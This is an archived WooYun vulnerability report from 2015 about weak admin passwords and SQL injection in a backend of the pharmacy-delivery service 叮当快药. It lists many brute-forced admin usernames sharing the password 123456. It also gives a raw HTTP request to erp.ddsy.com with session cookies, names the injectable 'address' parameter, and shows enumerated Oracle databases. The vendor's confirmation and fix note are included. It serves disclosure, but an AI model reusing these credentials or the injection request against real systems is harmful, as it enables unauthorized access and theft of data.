乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-13: 细节已通知厂商并且等待厂商处理中 2015-07-13: 厂商已经确认,细节仅向厂商公开 2015-07-23: 细节向核心白帽子及相关领域专家公开 2015-08-02: 细节向普通白帽子公开 2015-08-12: 细节向实习白帽子公开 2015-08-27: 细节向公众公开
叮当快药某后台弱口令+SQL注入敏感信息泄露
买药要让我扫二维码加APP,这是主动让我来进行安全测试呀,进行搜索你们的网站等到了一个后台,没加验证码可进行暴力破解
暴破出N多管理员密码
wangjing 123456 wangli 123456 liming 123456 wangpeng 123456 liuli 123456 liying 123456 libo 123456 chenli 123456 wangli 123456 wanghong 123456 wangjing 123456 yangfang 123456 zhanghongmei 123456 liying 123456 liuli 123456 liguifang 123456 zhangnan 123456 libo 123456 wangli 123456
进后台还发现存在SQL注入漏洞,可进行全站拖库,我是好人不拖库只做测试
POST /order/query.htm HTTP/1.1Host: erp.ddsy.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/plain, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://erp.ddsy.com/order/view.htmContent-Length: 109Cookie: td_cookie=137694995; td_cookie=137507137; ddsy_token="Jz3N/0qDhfyf4jm4msMBeQ=="; JSESSIONID=21D41308766B16EE686CBAAEACBE46C1X-Forwarded-For: 8.8.8.8Connection: keep-alivePragma: no-cacheCache-Control: no-cacheid=&pharmacyName=&pharmacyId=&orderStatus=2&startDate=&address=111111&endDate=&province=&city=&page=1&rows=50
address参数没进行过滤
available databases [20]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] GENE[*] GOLDENGATE[*] MDSYS[*] O2O[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB
改密码加验证码过滤,如果厂商来确认能送10K京东卡吗,哈哈
危害等级:高
漏洞Rank:10
确认时间:2015-07-13 11:47
内部系统对外未屏蔽访问。SQL注入已加入拦截机制。感谢提供的信息。谢谢
暂无